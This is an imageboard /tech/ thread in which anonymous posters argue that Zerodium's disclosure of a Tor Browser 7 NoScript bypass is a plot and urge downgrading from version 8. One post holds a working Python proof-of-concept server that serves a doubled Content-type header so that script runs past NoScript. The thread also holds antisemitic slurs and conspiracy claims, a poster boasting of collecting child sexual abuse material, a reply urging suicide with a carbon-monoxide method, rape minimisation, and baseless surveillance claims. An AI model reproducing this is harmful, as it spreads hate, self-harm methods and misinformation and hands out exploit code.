/tech/ - Technology★

>>1012232

3 minutes passed and CIA is present in thread

>>1012230 (OP)

In what possible method of your crackpot thinking, did you somehow conclude that Tor is compromised by CIA/Mossad?

No, seriously, tell me.

>A company that earns profit on selling exploits for tor browser is telling you that tbb 7.X in UNSAFE and you need to migrate to SAFE tbb 8. does that sound legit? what is their motivation? how do you think?

>if TBB 7 is so insecure, why would they speak about it publicly instead of selling zero-days for it?

>the true reason is, because they have a lot of zero-days for TBB8, whereas TBB7 is mature and they won't be able to find much more holes.

When you hear or read something, look at who is saying that and what is his true motivation. What he wants to achieve with it. What are his hidden motives.

Facts:

Zerodium = Private company that earns money on selling Tor Browser zero-days to governments

So Zerodium has zero motivation to help people avoid zero-days, it has opposite motivation, to trap people into zero-days and sell those to governments.

That means, when Zerodium tells you to do X, that means X will fuck you up. In this case X = "Update your Tor Browser and Firefox goyim!"

When Zerodium tells you "goyim Tor Browser 7 is insecure" and "goyim Tor Browser 8 is TOTALLY secure and safe", it's actually opposite. TBB7 is safe and they don't have exploits for it, but they have huge amount of exploits for TBB8.

Their only point of existence is making profits for their shareholders, making profits by selling zero-days to governments.

We need to downgrade to Tor Browser 7

>using noscript

>not just turning js off in about:config

>>1012234

>In what possible method of your crackpot thinking, did you somehow conclude that Tor is compromised by CIA/Mossad?

>No, seriously, tell me.

Tor is making many changes that lower anonymity and security of Tor users. Some time ago they also kicked off one guy on false rape accusations.

Why CIA? Because Tor Project is based in US. Why Mossad? Because jews and Mossad own US and CIA. Americans are cucks that do everything what israel tells them. Israel even told americans to destroy their children's penis foreskins and americans complied with that.

>>1012236

>using noscript

>not just turning js off in about:config

NoScript allows you to occasionally enable javascript on a website

but if you don't do that then yes, turning it off in about:config could be much safer

>>1012239

>File: cea3567340f932a⋯.jpg

jews and SJWs infiltrated Tor Project long time ago

also, the bug was in NoScript, not in TBB7 itself. why zeriodum shills told people to update TBB instead of just updating NoScript?

if you have a hole in your tire, you should change your tire, not your car. but Zeriodum told people to change a car

>there are people in this very thread that updowngraded to 2GB-startup-memory TBB 8.x

lmaoing @ u

>>1012254

>there are people in this very thread that [s]up[/s]downgraded to 2GB-startup-memory TBB 8.x

there is a theory that, not many people "upgraded" to Tor Browser 8 / Firefox ESR 60, so (((they))) ordered (((Zerodium))) to publish that recommendation and muh exploit

Tor Browser 8 / Firefox ESR 60 = bloat, a lot of new code, huge potential attack surface.

Stay away from it, let goyim test it and be lab rats

>>1012234

Well pictures like related are dead give aways of (((their))) influence on tor. Firefox ESR 52 is also botnet because of CSS3. Get on palemoon 27 you faggots as it uses the firefox 27 codebase, which was clean, but with security and effiency optimizations.

>>1012248

> Americans are cucks that do everything what israel tells them. Israel even told americans to destroy their children's penis foreskins and americans complied with that.

🇺🇸 = 🇮🇱

Why doesn't Tor disable exploitscript in their fagfox build? Surely there's a flag for that.

>>1012284

There's not a build time flag for that because the javascript code is intertwined with the layout engine/displayer. Unless you recode that entirely like they are in rust you can't just rip out javascript. Even then you can't just rip out javascript since webextensions need it to run. Even then you can't because the auto updater and the firefox sync requires it to run. And even then there's probably more shit I am unaware of that requires it, all of which would mean heavy source code editing or going back to a earlier version of firefox where this shit wasn't so intertwined as to be botnet.

>>1012286

why not use a webbrowser like Lynx

They are compromised and went shit since Applebaum was made to leave because muh sex harrasment, rape and whatever.

>>1012239

supporter=/=dev

>>1012248

They accepted the sad reality of javascript-riddled internets, therefore devalued their browser suite.

>>1012251

Another point for umatrix.

>>1012257

implying the previous 3 releases weren't shit too, >>1012265 just as this anon said

The only problem is that palemoon cannot be trusted.

>>1012296

fingerprint

>>1012235

Check the exploits, how they work and you'll realize why they're fixed now.

>>1012248

>Tor is making many changes that lower anonymity and security of Tor users.

[Citation needed]

>>1012251

Why don't you tell us? Check the exploit ans why it works in TBB7 but not 8.

That's the problem with pol crossposters: you don't understand or care about tech. You just read some bullshit about sjw in a project and decided to come here and spread your bullshit. Either back up your claims or go back to your shitty board.

>>1012284

Because most users want or need JS for whatever reason. NoScript also has more security features than just JS blocking: like preventing cross-site scripting, clickjacking, etcetera.

>>1012301

Doesn't just turning off JS already make you different than most other traffic?

>>1012234

>In what possible method of your crackpot thinking, did you somehow conclude that Tor is compromised by CIA/Mossad?

>No, seriously, tell me.

By the blinding glow in your post.

>>1012309

> security features

It's hard to believe this house of cards is safer than something like Lynx. First off the browser itself is a bloated shit that's trying to compete with systemd to see who can win the special olypics of code-shitting. Then you have JS, literally a remote code execution facility. And on top of all that shit you're running various scripts and add-ons, because obviously that functionality is too massive to have fit in Firefox itself (instead they give you "features" like making it harder and harder for the user to configure his browser every new release).

>>1012301

is a Fingerprint with X% more uniqueness not a good trade off for the lowered attack surface?

>>1012322

>lowered attack surface?

lowered attack surface of botnet is still botnet

>>1012325

wich are the conditions for a Webpageddisplay Programm to be considered non "Botnet"?

>>1012230 (OP)

Here's a short list of what's wrong with the Tor Project

- A person at the Tor Project hired (or wanted to hire) a (former) CIA person without notifying it's fellow Tor Project employees[1][2]

- Shari Steele's husband Bill Vass worked for the NSA[3] and now works for Amazon Web Services

- Rob Thomas a Rabbi is listed as a Tor Project team member (red flags for me!)

- They don't mind child porn, drugs, murderers for hire, but White Nationalism (fuck the DailyStormer though) has to be officially and publicly denounced[4].

- It has been infiltrated by SJWs

Here's a short list of what's wrong with Tor Browser

- Javascript is enabled by default

- Javascript is re-enabled each time you restart the browser

- They let user be fingerprinted because "it breaks some MAC OS keyboard shortcuts" [5][6]

[1]: https://www.ibtimes.co.uk/leaked-tor-project-chat-logs-reveal-it-struggled-over-hiring-ex-cia-agent-1567591

[2]: http://pastebin.com/WPAmqkW8

[3]: https://bvass.wordpress.com/tag/nsa/

[4]: https://twitter.com/torproject/status/898256109789687808

[5]: https://gitweb.torproject.org/tor-browser.git/tree/toolkit/components/resistfingerprinting/nsRFPService.h

[6]: https://trac.torproject.org/projects/tor/ticket/26146

I'm still using it because it gives me a false sense of security. And no alternatives, really

>>1012327

And Government funding of course.

>>1012334

Not to mention disabling JS on clearnet sites itself is a huge fingerprint

>>1012230 (OP)

fyi, @isislovecruft (my colleague & one of core tor developers) is cia.

>>1012343

[citation needed]

She has a nice pinned Tweet though:

x="if(t%2)else";python3 -c"[print(t>>15&(t>>(2$x 4))%(3+(t>>(8$x 11))%4)+(t>>10)|42&t>>7&t<<9,end='')for t in range(2**20)]"|aplay -c2 -r4

lel XD just use tor browser!!

>>1012340

Well just the fact that people want to browse websites that require JS means they don't care at all about security. All you've done with those add-ons is pile on some mitigations. You're not willing to actually make any sacrifices, so you play this security theatre game where you address the symptoms, but never solve the problem. You've been playing this "add-on of the week" game for how many years now? But the fundamental problems are still there, and getting worse. You've solved nothing, but what you have done is give those shitty JS websites more validation to exist, and you've become dependent on them. But that's by your own choice. Nobody can force you to use those sites, just like they can't force you to run Windows, systemd, or have Intel botnet computer.

>>1012367

Not the same guy you're responding to but I'd love to use something as simple as Lynx but my main concern with that is fingerprintability.

>>1012233

>everyone who realizes how fucking retarded I am is CIA

>Tor encourages users to disable JS

They actively discourage users to do that by re-enabling Javascript each time the browser restarts. It's incredibly annoying.

>>1012230 (OP)

I'm a bit slow to realize it but yes, OP, it's incredibly fishy when a private corporation (Zerodium) that sells Zero Day exploits to Government agencies is telling people to move away from an allegedly insecure browser and upgrade. I might consider down-grading with some patches to prevent fingerprintability ...

>>1012377

https://web.archive.org/web/20180913020822/https://dist.torproject.org/torbrowser/7.5.6/

>>1012377

Bummer 7.5.6 does not support TLSv1.3 so you cannot imitate Tor Browser 8+ ... would using WaterFox + Tor Browser 7 patches be a good idea?

>>1012386

If you have to ask, then no.

>>1012385

Probably my mistake then...

>>1012386

Change "security.tls.version.max" to "4" and you'll have TLSv1.3 support

>tor defaults javascript on

>some residual and vestigial stuff addons or moz services still in there

>probably has that easter egg appear when you remove every icons from the sandwich button

>Soros direct acquisition to battle "fakenews" (censorship and surveillance in general)

>people maximize the browser anyways

>is made so the multinational billionaires can sell their drugs due to East Asian war on drugs.

Anyway using tor with your wired home IP is just suicide. kill-grid beacon UUID system + NORA and NAMESDB = your death.

If you're not stupid you'd go on a densely populated area and use wireless modems + several kilometers wifi to obfuscate your location real location and of course you should conceal that antenna too.

>>1012230 (OP)

Imitating Tor Browser 8 with Tor Browser 7.5.6

security.ssl.disable_session_identifiers = false

security.enable_tls_session_tickets = true

general.useragent.override = "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"

security.ssl3.dhe_rsa_aes_128_sha = false

security.ssl3.dhe_rsa_aes_256_sha = false

security.ssl3.ecdhe_ecdsa_aes_128_sha = false

security.ssl3.ecdhe_ecdsa_aes_256_sha = false

Download of 7.5.6 here:

https://web.archive.org/web/20180913020822/https://dist.torproject.org/torbrowser/7.5.6/

>>1012396

Not to forget:

app.update.enabled = false

>>1012398

And:

security.tls.version.max = 4

>>1012396

Nevermind, it's SSL is still distinguishable

TBB 8.5a5

>Application Layer Protocol Negotiation Yes h2 http/1.1

TBB 7.5.6

>Application Layer Protocol Negotiation Yes http/1.1

https://www.ssllabs.com/ssltest/viewMyClient.html

>browser

>is in any way secure

Guess what retards? Go to china where there's like 50 black hats per square km. YOU go tell them about how your tor browser bundle is absolutely secure. They will laugh at you and then pity you. Ask any hacking company there, well guess what? They all have zero days to brag during hackathon or some promotion shit or competition. They know the ins and outs of this bloated pile of code called firefox and it would seem as if it's child's play to them. You guys are just unaware of how bad things are. If you really care about having a secure browser then make one yourself. It's pretty easy. You just all forget what hacking is all about. You let other very suspicious bunch do your programs then that's what you get for having the trust of a retard. Even kids instinctively know when to not take the candy.

>>1012403

>square km

square meter

This happened months ago. This isn't news. Also if you read the readme old release can be found here

https://archive.torproject.org/tor-package-archive/torbrowser/

>>1012327

> Javascript is re-enabled each time you restart the browser

No it isn't. At least using the security slider it isn't.

>>1012396

Couldn't you use css3 to distinguish between the two? Certain features in firefox 60 aren't in firefox 52.

>>1012412

>Couldn't you use css3 to distinguish between the two?

Yes. Browsers are truly shit the W3C, Google, Mozilla, [some web-related organization] is constantly spewing out new web techonologies and for little gain, so it's almost impossible to fork a project and not be fingerprintable

>At least using the security slider it isn't.

That was my mistake, I used the NoScript GUI to disable Javascript globally (now I'm just using uBlock Origin to block Javascript)

>old release can be found here

Thanks.

>>1012403

>If you really care about having a secure browser then make one yourself. It's pretty easy

It isn't easy to create a modern web-compatible browser though it is very easy to simply download everything you want and browse it offline in whatever shitty browser you choose. I think that's the best way.

>You guys are just unaware of how bad things are

Yes. And not just in technology ...

>>1012230 (OP)

>Tor Browser

≠TOR

Most of us use TUI wo/Javashit

>>1012248

>>1012301

>Some time ago they also kicked off one guy on false rape accusations.

Jacob Appelbaum was harassed by SJW Twitter, not TOR devs. George Soros to blame here, maybe CIA, but def. George.

>>1012271

This is true.

>>1012296

This

>>1012327

>short list of what's wrong with the [any] Project

You'd be surprised what some Linux devs are into.

>using it because it gives me a false sense of security. And no alternatives, really

ROFL

>>1012230 (OP)

They shared it after the newest version was released because it has no value to them now. They want to show off their inventory by sharing something that worked all the way until the next version. Saying 8.0 is no longer affected means "If you didn't know it yet, it has no value to you now." Why would they want to share a working exploit with their competitors?

Also, useragent is nothing. There are like three operating systems. So what if one mass becomes three masses.

Plus, that was a quick advisory. "The noscript plugin is buggy" isn't as dramatic as saying the whole package is flawed. It's also easier to communicate since there's a new browser out and the problem is fixed, just upgrade the whole thing and be done with it, consumer.

Plus also, alphanumeric agencies use the network to communicate overseas. They may control and analyze the network but idk why they would compromise their own communication tool in a serious way. Maybe it's a it's broken and everyone knows it's broken, so lets not fool ourselves into thinking changing the user agent is going to make things more secure, kind of compromise.

>>1012254

Even my out of commission toaster has 8 GB, what kind of ancient technology are you running?

Everyone who disagrees with me is CIA

8ch is compromised. Leave while you can.

Who the hell relies on noscript to block javascript in tor? Just set javascript.enable to 0.

>>1012477

>Jacob Appelbaum was harassed by SJW Twitter, not TOR devs. George Soros to blame here, maybe CIA, but def. George.

They threw him under the bus regardless, like leftists always do. They never have the balls to say no to some "oppressed" "minority".

>>1012334

Since all those retards have JS on all the time turning it off is going to make you stick out. If you turn it on to blend in with the rest of the retards you're risking being compromised by a JS exploit. If I have to pick one I'm going to pick the former, since JS exploits are likely what were used in all or near all deanonymization attacks on Tor.

>>1012265

>Well pictures like related are dead give aways of (((their))) influence on tor. Firefox ESR 52 is also botnet because of CSS3. Get on palemoon 27 you faggots as it uses the firefox 27 codebase, which was clean, but with security and effiency optimizations.

The problem is you cannot just use another browser with Tor. If you configure normal browser to use socks proxy and set it to Tor, you won't have this:

-your browser won't have stream separation as in Tor Browser

-your browser will behave differently, will send different headers, you will stand out

-your browser won't have other security and privacy tweaks that Tor Browser has

That's why we are forced to use Tor Browser

>>1012296

>why not use a webbrowser like Lynx

see above

it would only work if we made a fork of Lynx, implement some Tor Browser features into it, then convince several thousands of people to use that browser

>>1012301

>They accepted the sad reality of javascript-riddled internets, therefore devalued their browser suite.

I am heavy javascript hater but I kind of support their decision to have javascript on by default

it will make more normies and people use Tor Browser. more Tor Browser users = easier to hide

advanced users will disable javascript

>>1012308

>Tor is making many changes that lower anonymity and security of Tor users.

>[Citation needed]

https://trac.torproject.org/projects/tor/ticket/27495

they removed useragent spoofing

>Why don't you tell us? Check the exploit ans why it works in TBB7 but not 8.

zerodium shills for TBB8 because it has hundreds of exploits, they can sell them

the exploit they found was fixed in NoScript update. TBB7 users only need to update NoScript

>>1012319

>It's hard to believe this house of cards is safer than something like Lynx. First off the browser itself is a bloated shit that's trying to compete with systemd to see who can win the special olypics of code-shitting. Then you have JS, literally a remote code execution facility.

you are right. from security point of view, Lynx is better. But from privacy point of view, Tor Browser is better because it has more users and anti-fingerprint measures.

>>1012327

>Javascript is re-enabled each time you restart the browser

I don't think that's true, unless you use Tails

>>1012340

>With Daily Stormer they stated basically the same thing.

the Daily Stormer statement was big and they promoted it everywhere.

I never heard Tor Project saying anything about pedo users and I am a pedo myself and CP collector.

>>1012373

>Some Mexican reporter may need to share delicate information about a drug cartel and in that case it doesn't matter if Google can slurp the metadata of the photos they're sending through Gmail to their colleagues, what matters is that some corrupt ISP or government official can't snoop it. Maybe a Chinese citizen wants to post on a forum against the Party. Maybe a bunch of Venezuelans need to go into a page that is blocked by the ISP or maybe they fear they may be in some sort of list just by browsing a couple of websites.

Total bullshit.

In those countries if you use Tor they will put you to jail and torture.

Also, if Tor was really about those reporters in 3rd world countries, THEY WOULD NOT DROP SUPPORT FOR WINDOWS XP & 2000. People in 3rd world countries use old operating systems like XP, not some newest botnet Win10.

The Tor exists so white people in first world countries can watch and distribute CP, also to make political parties being able to spam and shill in easier way.

>Tor also can't protect users who go to non-https websites

It does protect them, it hides user location.

>And for what it is, Tor works fucking great.

Yes, it works great for CP. I have terabytes of it. I love CP.

>All the alphabet agencies' leaked documents have shown thus far that they have trouble breaking Tor.

how do you know if they were leaked or "leaked" (false flag)?

>>1012377

>I'm a bit slow to realize it but yes, OP, it's incredibly fishy when a private corporation (Zerodium) that sells Zero Day exploits to Government agencies is telling people to move away from an allegedly insecure browser and upgrade. I might consider down-grading with some patches to prevent fingerprintability ...

THAT'S THE POINT

I can't understand why nobody else realized how fishy it is

>>1012385

>I just tested it and it retains my settings between restarts. Why are you lying on the internet?

maybe he uses Tails. Tails is a honeypot and it's insecure. use Whonix instead of Tails. https://whonix.org but remember to encrypt your entire PC or whonix VM.

>>1012386

you don't need to imitate Tor Browser 8. There is still plenty of TBB7 users.

>>1012396

>Imitating Tor Browser 8 with Tor Browser 7.5.6

This should work well without javascript. But I am afraid if someone enables javascript tbb8 won't be imitated

but we dont have to imitate TBB8. if there is still plenty of people that use TBB7.

>>1012489

>They shared it after the newest version was released because it has no value to them now. They want to show off their inventory by sharing something that worked all the way until the next version. Saying 8.0 is no longer affected means "If you didn't know it yet, it has no value to you now."

That's not correct because many people disabled autoupdating in Tor Browser. Also some people who updated to TBB8, when they saw how shit and bloated it is, they reverted to TBB7. So (((they))) had to do something to push people into TBB8 trap.

>Why would they want to share a working exploit with their competitors?

They released this exploit in order to force people to "upgrade" to TBB8, in order to sell even more exploits. TBB8 is huge amount of new code, huge new attack surface to find exploits.

>Also, useragent is nothing. There are like three operating systems. So what if one mass becomes three masses.

That's very wrong. Tor Browser userbase is small. They shouldn't make it easier to fingerprint.

>Plus, that was a quick advisory. "The noscript plugin is buggy" isn't as dramatic as saying the whole package is flawed.

So you agree that they lied. If they lied, we cannot trust them with anything they said.

>It's also easier to communicate since there's a new browser out and the problem is fixed, just upgrade the whole thing and be done with it, consumer.

What bullshit are you speaking?

There is also new NoScript version and it's even easier to update because you only need to download small .xpi and you don't even need to restart web browser to update it.

>Plus also, alphanumeric agencies use the network to communicate overseas. They may control and analyze the network but idk why they would compromise their own communication tool in a serious way.

it's not a problem if only they know about those exploits.

Also, CIA doesn't use Tor Browser. They use Tor with other browser. Because CIA only needs to hide from local ISP that they connect to CIA network, they don't need anti-fingerprint measures. When they login into CIA network, the CIA network knows who they are anyway.

>>1012513

ARM is a botnet.

>>1012577

>Who the hell relies on noscript to block javascript in tor? Just set javascript.enable to 0.

you won't be able to temporary enable javascript for one site if you do that.

>>1012626

if that's legit then Tor = CIA

but first you should check if maybe some addons modify that setting, not browser. maybe NoScript does that?

set javascript to disabled, close tor browser, then start it in safe mode, without any extensions turned on (except tor launcher, tor button). so disabled noscript, httpseverywhere etc

and see if browser still switches your javascript

>>1012591

>>1012593

>>1012594

Have you thought about taking a break from Tor and going with a basic VPN setup for a few months? You have clearly lost the plot and I would be concerned if I didn't think you were larping. What's fishy is how you're shilling TBB7 with an unsigned NoScript patch and only gave hashes for the bundle. Did you pull a mint linux (https://lwn.net/Articles/676613/) and compromise the NoScript site?

>>1012591

- multiple tor instances for separation

- local proxy to fix headers and make it look like tbb

- use a simpler browser, less behaviour, no javascript. it's just HTTP 1.0 in the end.

>That's why (((we))) are forced to use Tor Browser

You know nobody around here says 'normies' unironically, right? Maybe you should add that fact to your shill wiki.

>>1012591

> ARM is a botnet

Proofs or gtfo. Also what hardware and OS are you running?

>>1012477

>You'd be surprised what some Linux devs are into.

I don't even want to know.

>They may control and analyze the network but idk why they would compromise their own communication tool in a serious way

I'm not sure what the international jew or Freemason uses for its communications. I guess if they used something other than Tor they'd stand out, but then again many are I think simply using Gmail (like John Podesta).

>>1012593

>==(((Yes, it works great for CP. I have terabytes of it. I love CP.)))==

I'm obliged to ask you to kill yourself. Just turn on the BBQ in a air-tight room wait 30 minutes or so enter the room and die of monoxide poisoning, it isn't painful and I highly recommend it.

>>1012677

>Have you thought about taking a break from Tor and going with a basic VPN setup for a few months?

Yes, I have. I think it's best to download the websites I need and browse shit offline anyway, this low-latency internet is wasting my time and very unproductive.

>>1012392

>Anyway using tor with your wired home IP is just suicide. kill-grid beacon UUID system + NORA and NAMESDB = your death.

Can you explain this? What is "kill-grid beacon UUID system + NORA and NAMESDB"?

>>1012477

>Most of us use TUI wo/Javashit

What is TUI?

>>1012477

Appelbaum was a spokesperson and developer of Tor (browser bundle?). It's clearly another harassment/rape card same thing they played against Assange.

>>1012755

Terminal user interface

>>1012754

>kill-grid

ISP

or fake ISP

either way, they're the same.

SAT/RF anything goes.

Kill-grid and botnet everywhere!

>beacon

It's like botnet but can phone to the source by itself. There's lots of them right now, people are just unaware and they better be :)

<inside your monitor, your AC power adapter, where do I start?

<CIA or similar 3LA intercepts your package to implant beacon on wires or keyboard or amazon package like say a new laptop :). not lying, they can use the voltage line of your wires.

<some of them even have a slots ready for these beacons. that weird schematic is intentional :) and oh that laptop probably has it in case you left it inside your apartment, they'll just insert it there and you'll notice that there seems to be an question mark device on your windows device manager bet it works on linux

<botnet CPUs, either Israel or Chinese backdoored IC.

<beacons small as a grain of rice and looks like a SMD capacitor but if you look very closely it looks like there's a lot of details in there and not just some capacitor though it has to look like one so you don't suspect it being a military level tech freebies :). try opening one up if you see them!

>UUID

Every device have UUIDs and this includes something as mediocre as storage devices or peripherals like mouse or display monitors so be careful next time you plug that mouse or HDD on your air gapped, wireless and network devices have mandatory FCC ID, if not they use other agencies under the same umbrella.

Every device is marked, identifiable and can be traced to who purchased it, country, region etc. If it has a gps-alike beacon within it like say an intel processor with built-in 3G modem killswitch/manageability engine, your location is already exposed.

<get UUID by firmware backdoor (or pass them through storage devices like how windows can hide UUID of computers where the storage has been plugged into inside System Volume Information)

<by leaky network card/mobo backdoors

<by botnet CPUs

<or as simple as nearby botnet-phones detecting your device's BT/wifi MAC. this is perfect since android 7 doesn't really 100% turn off the wifi

>NORA

Search results aren't helpful right? Here you go.

http://radar.oreilly.com/2005/04/non-obvious-relationship-aware.html

It's not fiction.

>NAMESDB

Names database. You have a birth certificate and chances are no.. you're not ready to know this.

>>1012230 (OP)

Someone who gets paid for selling exploits won't make any money if all needed exploits are already known.

>>1012797

<opening up

>not decapping

This is how I know you are larping somewhat. Then you larp even harder by not explaining the kill grid in detail.

>NAMESDB

Does this affect non-USA humans and if it does what information is collected? Also

>no archive

https://archive.fo/A8pek

>His current focus is “anonymous entity resolution” --- the ability to share sensitive data without actually revealing it. That is, by using one-way hashes, you can look across various databases for a match without actually pooling all the data and making it available to all.

So essentially hack/obtain someones database, make a hash of all the data, and then pool all the hashes together with a list of where each hash is. Label each hash: i.e real name, fake names, usernames, and then attach to a real human. So the hashes should be available somewhere on some USA gov website. Where are they then?

>>1012802

Just because one person NSA knows about the exploit doesn't mean another person Russian knows about the exploit. So you could still sell the exploit to the one who is unaware of it.

>>1012881

Actually this brings up an idea. A exploit salesman could figure out the known unknown's i.e the exploits someone is aware of. All you have to do is try selling the exploit to someone such as the gchq and see if they want it/already have it based on how the sale is responded to.

Then you use that information to protect yourself and others from exploits others don't or do have.

>>1012881

If we're judging people based solely from financial motive, then it's more likely that previous tor browser exploits are well known so they're pushing for a browser with at least less well-known exploits.

Regardless,conspiracy arguments can conclude anything. Evidence is especially needed here.

>>1012677

>Have you thought about taking a break from Tor and going with a basic VPN setup for a few months?

Why would I?

VPN is inferior to Tor in every aspect. VPNs are honeypots. They are shilled by VPN companies.

VPN can only protect you from showing your IP to people on IRC, or hide from your ISP that you are downloading torrent. That's all they do and you need to pay for that shit.

>You have clearly lost the plot and I would be concerned if I didn't think you were larping.

?

>What's fishy is how you're shilling TBB7 with an unsigned NoScript patch and only gave hashes for the bundle.

NoScript did not give hashes. But we can post ours and compare.

>- multiple tor instances for separation

that's stupid.

I meant different separation. This is how TorBrowser works:

1. You open 8ch.net in a tab. it connects to 8ch and other servers (images, ads, shits) using CIRCUIT_A

2. You open nigger.com in other tab. it connect to site and included stuff (images ads etc) using CIRCUIT_B

even if 8ch and nigger.com includes stuff from one server for example google.com, you will connect to google.com using separate circuits.

but if you instead use a web browser like Lynx (with Tor) it will use different circuit for every different hostname, but same circuit for same hostname if multible tabs are using it. so google.com or facebook could track you and link all your tabs to one person

and if you use multiple tor instances for every application that you use, that's very very bad, because you will be connected to multiple entry nodes and correlation attacks will be several times easier, than if you used single entry node for a lot of stuff (every application)

I know this because I work at Tor Project.

>- use a simpler browser, less behaviour, no javascript. it's just HTTP 1.0 in the end.

but your browser doesn't work with 80% sites.

>>1012682

>ARM is a botnet

>Proofs or gtfo.

https://developer.arm.com/technologies/trustzone

https://en.wikipedia.org/wiki/ARM_architecture#Security_extensions

>Also what hardware and OS are you running?

Pre-ME, Pre-PSP, Pre-UEFI.

non-botnet OS

cannot tell more because it could be used to identify me

>>1012748

>I'm obliged to ask you to kill yourself. Just turn on the BBQ in a air-tight room wait 30 minutes or so enter the room and die of monoxide poisoning, it isn't painful and I highly recommend it.

Just reported this post to feds. Encouraging suicide is illegal and punishable by law. You better use 7 Tor's.

I won't kill myself and I will continue to have fun with little girls.

>Yes, I have. I think it's best to download the websites I need and browse shit offline anyway, this low-latency internet is wasting my time and very unproductive.

When working on different projects, be it computer related or not, it's often necessary or useful to use internet to research something or find solution for a problem.

>>1012775

>Appelbaum was a spokesperson and developer of Tor (browser bundle?). It's clearly another harassment/rape card same thing they played against Assange.

this

and even if he raped or harassent someone, who cares? He was good workmate, I liked him. The whole rape thing is a joke, many women even like rape but they won't admit it openly

>>1012778

>Terminal user interface

that's shit. go back to your commodore shit

terminal user interface is unproductive

>>1012797

can you provide some proofs or citations?

>>1012904

>If we're judging people based solely from financial motive, then it's more likely that previous tor browser exploits are well known so they're pushing for a browser with at least less well-known exploits.

Tor Browser 7 exploits are known and fixed, as it received many bug fixes. Tor Browser 8 contains big amount of new code, that will result in many new exploits.

>>1012911

>Tor Project is infected with /tech/ users

FUCK FUCL WHAT THE HELL

>>1012797

>android 7 does not turn the wifi off really

could you explain? what about airplane mode?

>>1012911

>this

>and even if he raped or harassent someone, who cares? He was good workmate, I liked him. The whole rape thing is a joke, many women even like rape but they won't admit it openly

[attached: man_grinning_with_eyes_closed.jpg]

when you invent an anonymitiy tool and your co-creator uses it to post apathy towards an alleged rape in your company and you cant fire (him?) because they used your tool

>>1012911

>supposed tor project worker uses a non botnet OS

>thinks that a command line interface is unproductive

<most possibly, his OS uses the command line in a big way

w.e.w.

>probably uses gnome 3 or some botnetted bloat snail thing

OP is a faggot. even for a troll this is tl;dr

>In an interview with ZDNet, Giorgio Maone, the author of the NoScript extension, said the zero-day was caused by a workaround for NoScript blocking the Tor Browser's in-browser JSON viewer. [https://www.zdnet.com/article/exploit-vendor-drops-tor-browser-zero-day-on-twitter/]

when your stupid blocker addon conflicts with internals of the web browser, you stop there, you don't work around. but yeah whatever enjoy your resultant vulns. also it sounds like the addon API is trash (most are). you should all kill yourselves for using a plugin (which is bloated as fuck and does far more than disabling JS on a per-site basis (for example XSS filtering)) to disable JS. literally just go to about:config and set javascript.enabled to 0. you can make a separate profile in firecox for accessing pages that require JS

>>1012945

What a clusterfuck. Morons are easily impressed by complexity. All the modern web and Tor shit is their pigpen.

>>1012591

>the exploit they found was fixed in NoScript update.

Monkey-fixed. This exploit bypass NoScript 5.1.9.

#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer

PORT_NUMBER = 31337

class myHandler(BaseHTTPRequestHandler):

        #Handler for the GET requests
        def do_GET(self):
                self.send_response(200)
                self.send_header('Content-type','text/json;') # Here is where the magic happens
                self.send_header('Content-type','text/html;') # Here is where the magic happens
                self.end_headers()
                self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>")
                return

try:
        server = HTTPServer(('', PORT_NUMBER), myHandler)
        print 'Started httpserver on port ' , PORT_NUMBER
        server.serve_forever()

except KeyboardInterrupt:
        print '^C received, shutting down the web server'
        server.socket.close()

>>1012230 (OP) Why did Zerodium expose Tor 7.x's vulnerability? It's simple. It's no longer valuable information. Many people already updated their Tor Browser to 8.x so only a few people use Tor 7.x.

can someone upload prefs.js file from Tor Browser 8?

so can compare between 7 and 8 version.

can someone post what headers does Tor Browser 8 send when it's doing requests?

>>1012396

>Imitating Tor Browser 8 with Tor Browser 7.5.6

>general.useragent.override = "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"

I suggest this:

Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

because it's more popular.

https://techblog.willshouse.com/2012/01/03/most-common-user-agents/

linux version has 0.9% share compared to 0.5% with Win7

>>1012400

>Nevermind, it's SSL is still distinguishable

any idea to fix that?

>>1012420

>Couldn't you use css3 to distinguish between the two?

>Yes.

even without Javascript?

>>1013082

how to run this shit to confirm?

>>1012230 (OP)

>fail to prevent JavaScript from running even with NoScript on the most secure setting.

Install uBlock Origin or uMatrix, disable JavaScript by default on those and enable it on trusted sites.

NoScript was proven to be shit time and time again. Tor devs are morons for keeping it.

>Also, TBB8 and FF60 drops support for many important operating systems.

which ones? It's still supported by any Linux distro, windows 7+ and android. Pretty sure any BSD can run it fine. Nothing else is relevant.

>TBB8 is that it stops spoofing useragent. It lowers your privacy.

It doesn't lower your privacy at all. Spoofed user agents aren't even useful since your OS can easily be detected. Nobody can know your physical location, your IP or your identity simply by knowing your OS. The only thing this affects is automated malware which uses specific OS attacks. So I guess Linux and Mac are at a loss here.

I'm pretty sure they only show if you're running Linux, android, windows or Mac, and reveal if it's 32/64 bit. Your specific distro or OS version is hidden (afaik, can't confirm now).

>>1014084

>even without Javascript?

Yes. CSS is powerful enough for fingerprinting without the use of js.

>>1014242

>Spoofed user agents aren't even useful since your OS can easily be detected.

>They let user be fingerprinted because "it breaks some MAC OS keyboard shortcuts"

Why sites use js useragent and break MAC OS keyboard shortcuts instead easy OS detection?

>>1012579

>They threw him under the bus regardless,

Cite then.

>>1012591

>you cannot just use another browser with Tor

Lynx is working pretty fine here

>>1012775

>It's clearly another harassment/rape card same thing they played against Assange.

Exactly. And TOR devs really don't care about your history, so long the code is good.

>>1012911

>I know this because I work at Tor Project.

<Not knowing what TUIs are

>that's shit. go back to your commodore shit

>terminal user interface is unproductive

So, are you CIA, or a newfag lying scum. You can't be one or the other:

Show us your git commits.

>>1014242

>CSS is powerful enough for fingerprinting without the use of js.

When did styling a webpage go so wrong?

>>1012371

You argue like a fucking kike, anon.

imagine being so brain-diseased that you think a branch of the useless US government is a bigger spying threat to you, a statistic, than capitalism

Can someone open TBB8 and post those values from about:config?

general.appversion.override

general.oscpu.override

general.platform.override

general.useragent.appName

general.appname.override

general.useragent.override

general.useragent.vendor

general.useragent.vendorSub

or even better, upload your prefs.js file

man losing your foreskin really made some of you americucks soft in the head. Nice thread!

>relying on NoScript

Can't you just disable javascript straight up? Every hidden service designed to be accessed via Tor shouldn't have JS to begin with.

>>1012235

